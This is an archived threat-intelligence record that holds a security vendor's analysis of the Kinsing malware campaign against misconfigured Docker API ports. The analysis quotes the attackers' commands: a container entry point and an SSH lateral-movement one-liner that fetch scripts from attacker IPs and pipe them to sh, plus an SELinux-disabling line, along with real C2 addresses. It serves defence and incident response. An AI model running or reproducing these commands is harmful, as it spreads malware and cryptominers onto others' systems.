{
	"id": "479ced0b-ac3e-4b1a-8d48-cbe5d76ae014",
	"created_at": "2026-04-06T02:13:12.98241Z",
	"updated_at": "2026-04-10T03:34:59.753903Z",
	"deleted_at": null,
	"sha1_hash": "85170fe111d35c71b73b70820d5eb5b7d95479f3",
	"title": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1351663,
	"plain_text": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments\r\nBy Gal Singer\r\nPublished: 2020-04-03 · Archived: 2026-04-06 01:30:47 UTC\r\nLately we’ve been witnessing a rise in the number of attacks that target container environments. We’ve been tracking an organized attack campaign that targets misconfigured open Docker Daemon API ports. This persistent campaign has been going on for months, with thousands of attempts taking place nearly on a daily basis. These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date. We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.\r\nUpdate (8/27/23) – Aqua Nautilus discovered a new campaign that exploits the Openfire vulnerability (CVE-2023-32315) to deploy Kinsing malware and a cryptominer.\r\nThe following graph shows the volume of attacks by day:\r\nIn this attack, the attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts. Our analysis of this attack vector exposes the techniques used, starting with exploiting the open port, through evasion tactics and lateral movement, all the way up to the end goal of deploying the cryptominer.\r\nHow the Attack is Initiated\r\nTaking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point:\r\n/bin/bash -c apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 1 of 8\r\nWe saw this entry point in every attack in this campaign, with the only change being the IP address that d.sh is downloaded from. We witnessed 3 IP addresses used in total: the one in the example above, 217.12.221.244 and 185.92.74.42.\r\nThe command does the following:\r\nUpdate packages with apt-get update\r\nInstall wget with apt-get\r\nStart the cron service\r\nDownload a shell script with the just-installed wget\r\nRun the shell script and read indefinitely from /dev/null to keep the container alive and running\r\nWe can see that the wget program was required to download the cron shell script. The script would later be used in order to gain persistence within the container.\r\nDefense Evasion and Persistence\r\nThe shell script d.sh, referred to from here on as ‘the shell script’, contains more than 600 lines. We discovered that the shell script does the following:\r\n1. Disables security measures and clears logs: echo SELINUX=disabled \u003e/etc/selinux/config\r\n2. Kills numerous applications, notably other malware and cryptominers.\r\n3. Deletes files related to other malware/cryptominers, most of them from the /tmp directory.\r\n4. Kills running rival malicious Docker containers and deletes their images.\r\n5. Downloads the ‘kinsing’ malware and runs it.\r\n6. Uses crontab to download and run the shell script every minute.\r\n7. Looks for other commands running in cron, and if any are identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:\r\ncrontab -l | sed '/update.sh/d' | crontab -\r\nRunning the Malware\r\nKinsing is a Linux agent, identified by VirusTotal after we submitted it for analysis. From here on we’ll refer to the malware as kinsing.\r\nA quick look at the malware’s strings reveals that it is a Golang-based Linux agent. It uses several Go libraries, including:\r\ngo-resty – an HTTP and REST client library, used to communicate with a Command and Control (C\u0026C) server.\r\ngopsutil – a process utility library, used for system and process monitoring.\r\nosext – an extension to the standard ‘os’ package, used to execute binaries.\r\ndiskv – a disk-backed key-value store, used for storage.\r\nRunning the malware in a controlled environment and monitoring it brought up more details about its malicious actions.\r\nCommunication with C\u0026C servers\r\nBefore the malware proceeded to deploy its payload, it attempted to communicate with servers in Eastern Europe. It appears that there are dedicated servers for each function that the malware executes:\r\n1. Attempts to establish a connection with the following IP address: 45.10.88.102. The attempts fail as the server does not respond.\r\n2. Connects to 91.215.169.111, which appears to be the main C\u0026C server. The malware communicates with that host over HTTP port 80, and sends small encrypted messages at regular intervals, every few seconds.\r\n3. Connects to 217.12.221.244/spre.sh, which we presume stands for spread, as we will see in the next paragraph, to download a shell script used for lateral movement purposes.\r\n4. Connects to 193.33.87.219 to download the cryptominer.\r\nC\u0026C communication\r\nDiscovery and Lateral Movement\r\nThe spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network.\r\nIn order to discover potential targets and locate the information it needs to authenticate against them, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the like. We did not identify any active scanning techniques used to identify additional targets.\r\nUsing the information gathered, the malware then attempts to connect to each host, using every possible user and key combination through SSH, in order to download the aforementioned shell script and run the malware on other hosts or containers in the network.\r\nThe actual shell script is named spr.sh this time around, but it is identical to the d.sh shell script used earlier in the attack sequence.\r\nThe following SSH command was used to spread it throughout the network:\r\nssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp \"sudo curl -L http://217.12.221.244/spr.sh|sh; sudo wget -q -O - http://217.12.221.244/spr.sh|sh;\"\r\nWe noticed a comment in the script for a 20-second sleep after every 20 SSH connection attempts, and their cleanup, possibly indicating that the attackers have some sense of evasion and were trying to hide their activities.\r\nSpre.sh script\r\nAt the last stage of the attack the malware runs a cryptominer called kdevtmpfsi. The cryptominer was identified by VirusTotal as a Bitcoin miner.\r\nThe cryptominer connects to a host with the 193.33.87.219 IP address using a login request over HTTP, receives further instructions, and starts mining cryptocurrency.\r\nThe infographic below illustrates the full flow of the attack:\r\nSummary\r\nThis attack stands out as yet another example of the growing threat to cloud native environments. With deployments becoming larger and container use on the rise, attackers are upping their game and mounting more ambitious attacks, with an increasing level of sophistication.\r\nHere is a summary of the attack components, mapping each component of the attack to the corresponding MITRE ATT\u0026CK tactics and techniques category:\r\nWe believe that DevSecOps teams must also up their game and become aware of the threats that are lurking in the cloud, and develop a security strategy to mitigate risks. Here’s a list of steps we’d consider taking:\r\n1. Identify all cloud resources and group them by some logical structure.\r\n2. Review authorization and authentication policies and basic security policies, and adjust them according to the principle of least privilege.\r\n3. Scan the images that you use, making sure you are familiar with them and their use, and run them with minimal privileges, such as avoiding the root user and privileged mode. Use Trivy, the open source vulnerability scanner.\r\n4. Investigate logs, mostly around user actions, and look for actions you can’t account for and other anomalies.\r\n5. Form a security strategy where you can enforce your policies with ease, and consider using cloud security tools that will widen your scope and reach within your cloud resources.\r\nWe encourage you to block access to the following IOCs (URLs, IP addresses and MD5 hashes):\r\nGal is a Security Researcher at Aqua. As part of the Aqua research team, his work focuses on researching vulnerabilities in Kubernetes and Networking around the cloud native world. When not at work, he likes going to music concerts and spending time at the beach with his friends.\r\nSource: https://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/"
	],
	"report_names": [
		"threat-alert-kinsing-malware-container-vulnerability"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441592,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.pdf",
		"text": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.txt",
		"img": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.jpg"
	}
}